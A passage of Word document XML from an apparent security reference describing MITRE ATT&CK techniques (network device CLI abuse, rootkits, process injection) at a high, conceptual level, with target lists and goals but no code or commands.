          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attackers use command-line interfaces on routers, switches, firewalls, and other network appliances to manage or manipulate network infrastructure. Access to these interfaces allows attackers to alter routing behavior, create hidden administrative accounts, and monitor or redirect network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7AB67" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76679510" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cisco IOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE7062" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JunOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA5D41" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fortinet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189877FC" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MikroTik</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FAB35" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197CD9F" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Modify routing configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B81D89" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create hidden accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D51E344" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Capture or redirect network traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59888104" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CA6412" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An attacker accesses a router through SSH and modifies firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436DFCC7" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="1C97EE57">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8729E5" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F1A98" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Persistence techniques allow attackers to maintain access to a compromised system even after reboots, password changes, or service interruptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C2257" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Rootkit — T1014</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E5DD1" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A rootkit is designed to hide malicious activity by modifying low-level operating system components such as kernels, drivers, or system calls. Rootkits allow attackers to remain hidden while maintaining privileged access to compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31D837" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Rootkits May Modify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40A627" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kernel behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2732D66C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458C62C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB77720" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Goals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561EB1A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hide malware presence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78853489" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Conceal malicious processes and files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D61C9" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Avoid detection by security tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD12CB" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1ADC6" w14:textId="479D016B" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Rootkits are highly stealthy and difficult to detect or remove.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C8B95A" w14:textId="77777777" w:rsidR="00B42FCF" w:rsidRDefault="00B42FCF" w:rsidP="00B42FCF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F9C115" w14:textId="77777777" w:rsidR="003168F2" w:rsidRDefault="003168F2" w:rsidP="00B42FCF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B0BABF" w14:textId="77777777" w:rsidR="003168F2" w:rsidRPr="003168F2" w:rsidRDefault="003168F2" w:rsidP="00B42FCF">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53648A00" w14:textId="30DDF328" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process Injection — T1055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530F129E" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Process injection involves inserting malicious code into legitimate running processes. By operating within trusted applications, attackers can evade antivirus detection, gain elevated privileges, and disguise malicious activity as normal system behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044A1177" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Reasons Attackers Use Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288CC272" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hide malware within trusted applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0C5C71" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bypass antivirus and security monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64432A66" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Elevate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBE729A" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Common Target Processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483F7F32" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF87BE" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5407510C" w14:textId="77777777" w:rsidR="007423AA" w:rsidRPr="003168F2" w:rsidRDefault="007423AA" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Browser processes</w:t>
      </w:r>
    </w:p>
